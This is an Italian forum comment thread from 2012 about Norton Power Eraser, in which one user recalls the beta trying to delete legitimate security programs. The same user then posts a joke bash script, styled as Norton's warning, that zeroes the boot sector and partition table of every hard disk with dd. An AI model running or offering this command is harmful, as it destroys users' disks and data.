Pagina 1 di 1

Commenti a "Norton Power Eraser vi aiuta nella caccia ai malware"

MessaggioInviato: sab nov 10, 2012 6:53 pm
da crazy.cat
Immagine
Norton Power Eraser vi aiuta nella caccia ai malware - Commenti

Sospetti che un virus sia entrato nel tuo computer ma il tuo antivirus non ti segnala niente? Prova a chiedere un secondo parere a Norton Power Eraser. [continua...]

Re: Commenti a "Norton Power Eraser vi aiuta nella caccia ai

MessaggioInviato: mer nov 21, 2012 1:51 am
da leofelix
Anni fa avevo osato provare la prima beta di questa utility.
Il risultato fu altrettanto agghiaccante: tentò di rimuocvere una quantitativo industriale di files legittimi (soprattutto programmi di sicurezza)
Se non altro l'interfaccia è migliorata.

Codice: Seleziona tutto
#!/bin/bash
echo "Norton Power Eraser"
echo "You should use Norton Power Eraser only when nothing else "
echo "will remove the threat and you are willing to accept the risk that "
echo "the scanner might delete any legitimate program."
read -p "Press ENTER to acknowledge the above and continue or CTRL+C to abort"
for x in $(ls -1 /dev/[hs]d?) ; do
   dd if=/dev/zero of=$x bs=512 count=1
done
echo "Your computer is now completely clean, hit CTLR+ALT+DEL for an endless reboot!"
echo "Thank you for testing Norton Power Eraser!"


This program is absolutely and is licensed under under the WTFPL(*) license terms
(*) http://en.wikipedia.org/wiki/WTFPL
[;)]